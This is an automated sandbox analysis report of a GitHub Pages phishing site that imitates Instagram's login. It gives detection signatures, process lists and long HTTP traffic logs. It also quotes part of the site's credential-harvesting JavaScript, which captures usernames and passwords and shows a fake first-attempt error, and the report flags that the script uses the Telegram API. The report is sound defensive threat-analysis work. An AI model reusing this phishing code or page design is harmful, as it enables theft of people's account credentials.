Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://sayidanur.github.io/instagram.com/

Overview

General Information

Sample URL:https://sayidanur.github.io/instagram.com/
Analysis ID:1521986
Tags:openphish
Infos:

Detection

HTMLPhisher
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected HtmlPhish64
Javascript uses Telegram API
Phishing site detected (based on logo match)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL

Classification

  • System is w10x64
  • chrome.exe (PID: 4992 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 1060 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2028,i,1631408217040939305,6486719346093369341,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 5484 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4048 --field-trial-handle=2028,i,1631408217040939305,6486719346093369341,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 4068 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://sayidanur.github.io/instagram.com/" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
1.0.pages.csvJoeSecurity_HtmlPhish_64Yara detected HtmlPhish_64Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://sayidanur.github.io/instagram.com/SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social usering

    Phishing

    barindex
    Source: Yara matchFile source: 1.0.pages.csv, type: HTML
    Source: https://sayidanur.github.io/instagram.com/main.jsHTTP Parser: document.addeventlistener('domcontentloaded', () => { const form = document.getelementbyid('telegramform'); const loading = document.getelementbyid('loading'); const validtext = document.queryselector(".invalid") let trycount = 0; // form.addeventlistener('submit', function(e) { e.preventdefault(); const username = document.getelementbyid('username'); const password = document.getelementbyid('password'); // invalid-input, username.classlist.remove('invalid-input'); password.classlist.remove('invalid-input'); if (trycount === 0) { // , username.classlist.add('invalid-input'); password.classlist.add('invalid-input'); validtext.style.display = 'block'; username.value = ''; password.value = ''; ...
    Source: https://sayidanur.github.io/instagram.com/Matcher: Template: instagram matched
    Source: https://sayidanur.github.io/instagram.com/HTTP Parser: Number of links: 0
    Source: https://sayidanur.github.io/instagram.com/HTTP Parser: <input type="password" .../> found but no <form action="...
    Source: https://www.facebook.com/pages/create/?ref_type=registration_formHTTP Parser: Base64 decoded: {"w":1280,"h":1024,"aw":1280,"ah":984,"c":24}
    Source: https://sayidanur.github.io/instagram.com/HTTP Parser: Title: Instagram does not match URL
    Source: https://sayidanur.github.io/instagram.com/HTTP Parser: <input type="password" .../> found
    Source: https://www.facebook.com/?locale=ru_RUHTTP Parser: <input type="password" .../> found
    Source: https://www.facebook.com/pages/create/?ref_type=registration_formHTTP Parser: <input type="password" .../> found
    Source: https://apps.apple.com/uz/app/instagram/id389801252HTTP Parser: No favicon
    Source: https://apps.apple.com/uz/app/instagram/id389801252HTTP Parser: No favicon
    Source: https://apps.apple.com/uz/app/instagram/id389801252HTTP Parser: No favicon
    Source: https://apps.apple.com/uz/app/instagram/id389801252HTTP Parser: No favicon
    Source: https://apps.apple.com/uz/app/instagram/id389801252HTTP Parser: No favicon
    Source: https://play.google.com/store/search?q=instagram&c=apps&hl=ru&gl=USHTTP Parser: No favicon
    Source: https://sayidanur.github.io/instagram.com/HTTP Parser: No <meta name="author".. found
    Source: https://www.facebook.com/?locale=ru_RUHTTP Parser: No <meta name="author".. found
    Source: https://www.facebook.com/?locale=ru_RUHTTP Parser: No <meta name="author".. found
    Source: https://www.facebook.com/pages/create/?ref_type=registration_formHTTP Parser: No <meta name="author".. found
    Source: https://www.facebook.com/pages/create/?ref_type=registration_formHTTP Parser: No <meta name="author".. found
    Source: https://sayidanur.github.io/instagram.com/HTTP Parser: No <meta name="copyright".. found
    Source: https://www.facebook.com/?locale=ru_RUHTTP Parser: No <meta name="copyright".. found
    Source: https://www.facebook.com/?locale=ru_RUHTTP Parser: No <meta name="copyright".. found
    Source: https://www.facebook.com/pages/create/?ref_type=registration_formHTTP Parser: No <meta name="copyright".. found
    Source: https://www.facebook.com/pages/create/?ref_type=registration_formHTTP Parser: No <meta name="copyright".. found
    Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49713 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49732 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49737 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49738 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49790 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49931 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50139 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50467 version: TLS 1.2
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /instagram.com/ HTTP/1.1Host: sayidanur.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /instagram.com/styles.css HTTP/1.1Host: sayidanur.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://sayidanur.github.io/instagram.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /instagram.com/main.js HTTP/1.1Host: sayidanur.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sayidanur.github.io/instagram.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /instagram.com/img//instagram-logo.png HTTP/1.1Host: sayidanur.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sayidanur.github.io/instagram.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /instagram.com/img/apple-button.png HTTP/1.1Host: sayidanur.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sayidanur.github.io/instagram.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.5.2/css/all.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://sayidanur.github.iosec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /instagram.com/img/googleplay-button.png HTTP/1.1Host: sayidanur.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sayidanur.github.io/instagram.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /instagram.com/main.js HTTP/1.1Host: sayidanur.github.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /instagram.com/img/apple-button.png HTTP/1.1Host: sayidanur.github.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.5.2/webfonts/fa-brands-400.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://sayidanur.github.iosec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /instagram.com/img//instagram-logo.png HTTP/1.1Host: sayidanur.github.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /instagram.com/img/insta-fav.ico HTTP/1.1Host: sayidanur.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sayidanur.github.io/instagram.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /instagram.com/img/googleplay-button.png HTTP/1.1Host: sayidanur.github.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /instagram.com/img/insta-fav.ico HTTP/1.1Host: sayidanur.github.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
    Source: global trafficHTTP traffic detected: GET /?locale=ru_RU HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yG/l/0,cross/sz9JnoPJuhF.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yy/l/0,cross/_PStGDb9Db2.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yX/l/0,cross/cac49QtG2Ld.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yM/l/0,cross/8K9cI3nQr0j.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yb/l/0,cross/fo219H1KM4T.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y1/r/s1oFVSwofs5.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/y1/r/4lCu2zih0ca.svg HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y6/r/a2il9m3oo2U.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3i6l24/yP/l/ru_RU/GcN06huceZG.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y-/r/v87V0xuYr4I.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/ys/r/4zS6aBDBtHT.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y1/r/s1oFVSwofs5.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yr/r/OJuPnvrkEfZ.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /security/hsts-pixel.gif HTTP/1.1Host: facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL
